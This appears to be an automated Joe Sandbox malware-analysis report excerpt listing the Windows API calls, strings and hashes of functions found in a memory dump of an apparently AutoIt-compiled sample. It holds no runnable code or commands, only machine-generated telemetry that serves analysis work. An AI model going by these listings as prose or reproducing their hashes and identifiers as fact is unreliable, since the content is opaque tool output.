                                                                                                                                                                                                                                                                            • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                            • Opcode ID: 17de1d13ab93f55323ae0ff20672fb899c86f6c101236f113f68ea6df27f12b2
                                                                                                                                                                                                                                                                            • Instruction ID: 460dc51f266c663bcd7db393a474316f851eb31675f1151f4a746d808672f2f9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17de1d13ab93f55323ae0ff20672fb899c86f6c101236f113f68ea6df27f12b2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3E10436A00556ABCF189FB4C8516EDFBB0BF14791F104229E866E7250DB30AFCDA794
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(00000000,00000000,00C8DCD0), ref: 00C64F6C
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C64F80
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C64FDE
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C65039
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C65084
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C650EC
                                                                                                                                                                                                                                                                              • Part of subcall function 00C0FD52: _wcslen.LIBCMT ref: 00C0FD5D
                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,00CB7C10,00000061), ref: 00C65188
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                            • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                            • Opcode ID: 332904dbf561ae8e2d29e06e124c56b17f339000882bb060a597a13e0816b4c3
                                                                                                                                                                                                                                                                            • Instruction ID: 2f2c5f9768852286ae759611f730806fc8a18798ca4e755c8674f290b8cf437b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 332904dbf561ae8e2d29e06e124c56b17f339000882bb060a597a13e0816b4c3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FCB1C0716087029FC724EF28C8D0A7EB7E5AFA5724F60491DF5A6C7291DB30D984CB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7BBF8
                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C7BC10
                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C7BC34
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7BC60
                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C7BC74
                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C7BC96
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7BD92
                                                                                                                                                                                                                                                                              • Part of subcall function 00C60F4E: GetStdHandle.KERNEL32(000000F6), ref: 00C60F6D
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7BDAB
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7BDC6
                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C7BE16
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 00C7BE67
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C7BE99
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C7BEAA
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C7BEBC
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C7BECE
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C7BF43
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                            • Opcode ID: ecd3406a32ef3379e727b11b1cf317644953c83945e42769f5415bb46700d220
                                                                                                                                                                                                                                                                            • Instruction ID: 175f3073f23075340a676b9d9953d952136d96c4efd7db0a21b00302ea90886c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecd3406a32ef3379e727b11b1cf317644953c83945e42769f5415bb46700d220
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52F1BF316043049FC715EF24C891B6EBBE1BF85314F18895DF99A8B2A2CB70ED45CB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00C8DCD0), ref: 00C74B18
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C74B2A
                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00C8DCD0), ref: 00C74B4F
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00C8DCD0), ref: 00C74B9B
                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028,?,00C8DCD0), ref: 00C74C05
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000009), ref: 00C74CBF
                                                                                                                                                                                                                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C74D25
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00C74D4F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                            • Opcode ID: fa41725991f43edc3181d17e03a56de77277cc976f15c115c9ecfea884d26291
                                                                                                                                                                                                                                                                            • Instruction ID: ea77baeb814094e205b4d92428c742b9dc0b1d528579922fd830d9d2cad6ea37
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa41725991f43edc3181d17e03a56de77277cc976f15c115c9ecfea884d26291
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78120A71A00119EFDB19DF94C888EAEBBB5FF45314F24C098E9199B251D731EE46CBA0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00CC29C0), ref: 00C33F72
                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00CC29C0), ref: 00C34022
                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C34066
                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 00C3406F
                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(00CC29C0,00000000,?,00000000,00000000,00000000), ref: 00C34082
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C3408E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                            • Opcode ID: 627ed637df0b795233fefad2e5f3698af270bb24cacab7985d5a280ef3b78d98
                                                                                                                                                                                                                                                                            • Instruction ID: 8a52f55d77856c5620580141ec4c104b18ca869342688d46c6b24a7e1db3779a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 627ed637df0b795233fefad2e5f3698af270bb24cacab7985d5a280ef3b78d98
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39715A70A04305BFEB209F68DC89FAABFA5FF04764F100256F624A61E0C775AE54DB54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,?), ref: 00C87823
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF8577: _wcslen.LIBCMT ref: 00BF858A
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C87897
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C878B9
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C878CC
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00C878ED
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BF0000,00000000), ref: 00C8791C
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C87935
                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C8794E
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C87955
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C8796D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C87985
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF2234: GetWindowLongW.USER32(?,000000EB), ref: 00BF2242
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                            • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                            • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                            • Opcode ID: 9201d66827b2aa66c68c75b3dd8d5efb7c7d049b7dd09c6c895cd55163014e20
                                                                                                                                                                                                                                                                            • Instruction ID: af3714e36b316522c90dc44cc18984df4a0bfa709e4ab90bfc02c2c92b965654
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9201d66827b2aa66c68c75b3dd8d5efb7c7d049b7dd09c6c895cd55163014e20
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77718B70108244AFD725EF18CC48F6BBBE9FB89308F14065DF995972A1D770EA06DB19
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BF24B0
                                                                                                                                                                                                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 00C89BA3
                                                                                                                                                                                                                                                                              • Part of subcall function 00C880AE: ClientToScreen.USER32(?,?), ref: 00C880D4
                                                                                                                                                                                                                                                                              • Part of subcall function 00C880AE: GetWindowRect.USER32(?,?), ref: 00C8814A
                                                                                                                                                                                                                                                                              • Part of subcall function 00C880AE: PtInRect.USER32(?,?,?), ref: 00C8815A
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00C89C0C
                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C89C17
                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C89C3A
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C89C81
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00C89C9A
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00C89CB1
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00C89CD3
                                                                                                                                                                                                                                                                            • DragFinish.SHELL32(?), ref: 00C89CDA
                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00C89DCD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                            • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                                                            • Opcode ID: e8ef00e7e977a4bbc9a6b83fe7505060e0658dd5a9326b900b47e3fe06b49ccb
                                                                                                                                                                                                                                                                            • Instruction ID: f66d19c2c150cab97ff7dd0b948f270075c31d8738477bfa09d85c2f2e699351
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8ef00e7e977a4bbc9a6b83fe7505060e0658dd5a9326b900b47e3fe06b49ccb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23618A71108305AFC701EF60DC85EAFBBE9EF89754F40092EF692931A1DB709A49CB56
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C6CEF5
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C6CF08
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C6CF1C
                                                                                                                                                                                                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C6CF35
                                                                                                                                                                                                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00C6CF78
                                                                                                                                                                                                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C6CF8E
                                                                                                                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C6CF99
                                                                                                                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C6CFC9
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C6D021
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C6D035
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00C6D040
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                            • Opcode ID: f6a62dcf4263d81449f0d3b2485fdaba678ccd7875f89be265049e3ddbd27fba
                                                                                                                                                                                                                                                                            • Instruction ID: 2c65fb28d7cc7cba144c8c792b7e1f9e0c898b5bf0d61d5229580a48dc557d85
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6a62dcf4263d81449f0d3b2485fdaba678ccd7875f89be265049e3ddbd27fba
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 405139B1A00608BFDB319FA1D8C8BBA7BBCFF08754F00441AF95696250D735DA45ABA1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00C866D6,?,?), ref: 00C88FEE
                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00C866D6,?,?,00000000,?), ref: 00C88FFE
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00C866D6,?,?,00000000,?), ref: 00C89009
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00C866D6,?,?,00000000,?), ref: 00C89016
                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C89024
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00C866D6,?,?,00000000,?), ref: 00C89033
                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C8903C
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00C866D6,?,?,00000000,?), ref: 00C89043
                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C866D6,?,?,00000000,?), ref: 00C89054
                                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00C90C04,?), ref: 00C8906D
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00C8907D
                                                                                                                                                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00C8909D
                                                                                                                                                                                                                                                                            • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00C890CD
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C890F5
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C8910B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                            • Opcode ID: ea9110f143b914ecad9316659bad7411f4d4d41abe750c7531353c980682d1f1
                                                                                                                                                                                                                                                                            • Instruction ID: b34e19b72d865a470523872ac0af35071e33daa87134798295ba727e0d82f130
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea9110f143b914ecad9316659bad7411f4d4d41abe750c7531353c980682d1f1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26412775600209BFDB11AF65DC88FAE7BB8EF89725F144058F916D72A0D7309E41DB24
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7C10E,?,?), ref: 00C7D415
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D451
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D4C8
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D4FE
                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7C154
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C7C1D2
                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(?,?), ref: 00C7C26A
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C7C2DE
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C7C2FC
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C7C352
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C7C364
                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C7C382
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00C7C3E3
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C7C3F4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
